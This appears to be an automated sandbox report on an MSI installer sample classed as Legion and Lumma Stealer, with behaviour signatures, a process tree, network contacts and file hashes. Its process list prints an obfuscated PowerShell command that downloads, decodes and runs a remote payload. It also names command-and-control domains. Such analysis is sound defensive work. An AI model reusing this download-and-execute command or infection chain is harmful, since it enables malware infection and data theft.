Malware Analysis Report

2024-11-30 05:29

Sample ID 240710-jeym4svcll
Target setup.msi
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
Tags
legion lumma discovery downloader execution loader persistence privilege_escalation stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431

Threat Level: Known bad

The file setup.msi was found to be: Known bad.

Malicious Activity Summary

legion lumma discovery downloader execution loader persistence privilege_escalation stealer

Lumma Stealer, LummaC

Legion family

Legion, RobotDropper, Satacom

Lumma family

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Event Triggered Execution: Installer Packages

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-10 07:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-10 07:35

Reported

2024-07-10 07:36

Platform

win10v2004-20240709-en

Max time kernel

36s

Max time network

41s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Legion family

legion

Legion, RobotDropper, Satacom

downloader stealer legion

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9C31.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9DAB.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e579a9e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9B27.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E0A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC4EC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC56A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{982F5EC8-DA77-4501-8948-29ED7D39B6D6} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e579a9a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e579a9a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9CA0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D0E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC9E0.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2828 wrote to memory of 1712 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2828 wrote to memory of 1712 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2828 wrote to memory of 1712 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2828 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 2828 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 2828 wrote to memory of 1276 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 2828 wrote to memory of 1276 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1276 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1276 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1276 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1276 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 4304 wrote to memory of 1492 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 1492 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 3616 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe
PID 4304 wrote to memory of 3616 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe
PID 3616 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3616 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3616 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3616 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3616 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5279812CD3015BE2801AE2C0BF344B54

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAwADIAMAA3ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 get-license2.com udp
US 104.21.17.66:443 get-license2.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 66.17.21.104.in-addr.arpa udp
US 8.8.8.8:53 hit-1488.com udp
US 104.21.68.5:80 hit-1488.com tcp
US 8.8.8.8:53 5.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 replica-souls.com udp
US 172.67.139.60:443 replica-souls.com tcp
US 8.8.8.8:53 two-root.com udp
US 172.67.169.37:443 two-root.com tcp
US 8.8.8.8:53 60.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 37.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 run-df.com udp
US 172.67.150.206:80 run-df.com tcp
US 172.67.150.206:443 run-df.com tcp
US 8.8.8.8:53 206.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 respectabledpcs.shop udp
US 104.21.4.85:443 respectabledpcs.shop tcp
US 8.8.8.8:53 bouncedgowp.shop udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 8.8.8.8:53 bannngwko.shop udp
US 104.21.81.196:443 bannngwko.shop tcp
US 8.8.8.8:53 bargainnykwo.shop udp
US 172.67.146.97:443 bargainnykwo.shop tcp
US 8.8.8.8:53 85.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 198.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 196.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 affecthorsedpo.shop udp
US 172.67.135.137:443 affecthorsedpo.shop tcp
US 8.8.8.8:53 radiationnopp.shop udp
US 172.67.196.169:443 radiationnopp.shop tcp
US 8.8.8.8:53 answerrsdo.shop udp
US 172.67.203.63:443 answerrsdo.shop tcp
US 8.8.8.8:53 97.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 137.135.67.172.in-addr.arpa udp
US 8.8.8.8:53 publicitttyps.shop udp
US 104.21.25.154:443 publicitttyps.shop tcp
US 8.8.8.8:53 benchillppwo.shop udp
US 104.21.81.128:443 benchillppwo.shop tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 reinforcedirectorywd.shop udp
US 172.67.214.98:443 reinforcedirectorywd.shop tcp
US 8.8.8.8:53 63.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 169.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 154.25.21.104.in-addr.arpa udp
US 8.8.8.8:53 98.214.67.172.in-addr.arpa udp
US 8.8.8.8:53 128.81.21.104.in-addr.arpa udp

Files

C:\Windows\Installer\MSI9B27.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI9DAB.tmp

MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

C:\Windows\Installer\MSIC56A.tmp

MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

C:\Config.Msi\e579a9d.rbs

MD5 1d5ce672e3d8bd25e799e5e839b9ed86
SHA1 fbad5cd1a1e79fcf4c8f9914280476aa4f884254
SHA256 f7cb0c9343bd18b70c288c216df27d8cda9cf77bb9b6e34cc98641d07f6842eb
SHA512 df4ba7b76fb6e74115082409004e97a62531dfe63d07a5db37c8ed949641383ff2c1ca5aaf198b8f4ef584f5846bfa4a616d8511232b245568e19cca2fa76763

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

MD5 63efe86838e7196cedd93d7c10ac40e6
SHA1 61dcc0ce49355f1f44a7c2ee97ace10feece2e03
SHA256 9e7f5695c50bde002223c72084b44d8d22ab12c3ad2ce993e1f08ae90c6d6172
SHA512 7773e45af4c85b35aa9afb347fab3723eef9469cd4ed45fda89e058167a57b66b106ef8cce7fdc90701dd13279a8ab61e45f7f4c7df8fd084e6513f362483dac

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

MD5 ae63517a3ce7949a2c084cd7541c2fd8
SHA1 8dafa610a0c3aa6ee2e50f657c90757bfae80336
SHA256 14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26
SHA512 fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

C:\Windows\Installer\e579a9a.msi

MD5 6e619d3d24f58bfb7bd7e76a4756e258
SHA1 890359e1e86525c4c14e975e762239878134b32d
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
SHA512 1a1f432c3c8ed5c627b2724b1fc5600ba31859838445b67d137c29439345e48bebe16074c3d9f909958af31670764422b379d7ced52c13feca7468e25a10162e

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

MD5 1825d0310bf5029899f42004c4a1ef83
SHA1 ac79aab26730982838f5af5eadfa1e48f4625947
SHA256 1c45bf1b4b0dbbf3eec7fbe8d08640c8df98a9679c9753a295a5d2e29d8b6a58
SHA512 7c7c433b74c9b247401af4b72563256bfef055a8f5e65071ddcffe727502445be7760b64a1e7844e69c625dda899b928500dcb2c144defcc1ccf2ed206632145

memory/1276-167-0x0000023626830000-0x0000023626855000-memory.dmp

memory/1276-158-0x0000023626800000-0x0000023626801000-memory.dmp

memory/4304-168-0x00000000000B0000-0x00000000000D8000-memory.dmp

memory/4304-169-0x00000000000B0000-0x00000000000D8000-memory.dmp

memory/4304-170-0x00000000000B0000-0x00000000000D8000-memory.dmp

memory/1492-172-0x0000025859F90000-0x0000025859FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hw2ez435.jjs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\dIJ2B1kAfxsPlOZ\svchost.exe

MD5 c3a8a0fd943924bfbd176c99df56ed2c
SHA1 8bc8d69cbec44704f062c08a919da992a425c720
SHA256 d1556baf48f206639e69f0e800e3360aa362f267c1c30b724140b6c713648df6
SHA512 71edb53cbf8d52d79615d5db834430870d6764ddcca4d8cf61d5fc4ddf404b259a974eb90944028ff20153561aa8b9fcc3374ae9badc6f6ac6b6d30150444f41

memory/4304-203-0x00000000000B0000-0x00000000000D8000-memory.dmp

memory/1492-204-0x0000025872C60000-0x0000025872C7C000-memory.dmp

memory/1492-239-0x0000025873760000-0x0000025873922000-memory.dmp

memory/1492-240-0x0000025873930000-0x0000025873E58000-memory.dmp

memory/5116-250-0x0000000000860000-0x00000000008B7000-memory.dmp

memory/5116-249-0x0000000000860000-0x00000000008B7000-memory.dmp

memory/3616-251-0x00007FF6AF8A0000-0x00007FF6B0221000-memory.dmp